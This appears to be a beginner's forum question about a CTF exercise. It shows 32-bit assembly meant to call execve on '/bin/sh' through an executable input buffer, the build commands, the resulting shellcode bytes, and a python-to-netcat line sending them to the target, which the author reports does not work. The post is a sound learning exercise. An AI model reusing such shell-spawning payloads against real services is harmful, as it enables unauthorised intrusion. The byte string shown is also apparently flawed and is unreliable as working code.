I am a Shellcode beginner and I started some CTFs. But I am stuck at the most basic exercise.
Let's say I have a program. This program gives me the pointer address of execve : 0x8048450 Let's say there is a char array "\bin\sh" of which I also have the address : 0x80486a5
The vulnerable code is :
char input[4096];
read(0, input, 4096);
((func)&input)();
The problem is that I do not have many information on the architecture targeted because I have no binary but I think it is 32-bit.
Here is my code :
section .text
global _start
_start:
xor eax,eax
xor ebx,ebx
xor ecx,ecx
xor edx,edx
mov eax, 0x80486a5
push eax
call 0x8048450
Then I run :
nasm -f elf -o shellcode.o shellcode.asm
and
ld -o shellcode shellcode.o -m elf_i386
Which gives
\xde\xde\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb8\xa5\x86\x04\x08\x50\xe8\xdd\x03\x00\x00
I execute
python -c "print('\xde\xde\x31\xd2\x31\xc9\x31\xdb\x31\xc0\xb8\xa5\x86\x04\x08\x50\xe8\xdd\x03\x00\x00')" | nc target port
but nothing. Do I have to put a NOP sled to fulfill the byte array ?
Thank you for reading me !
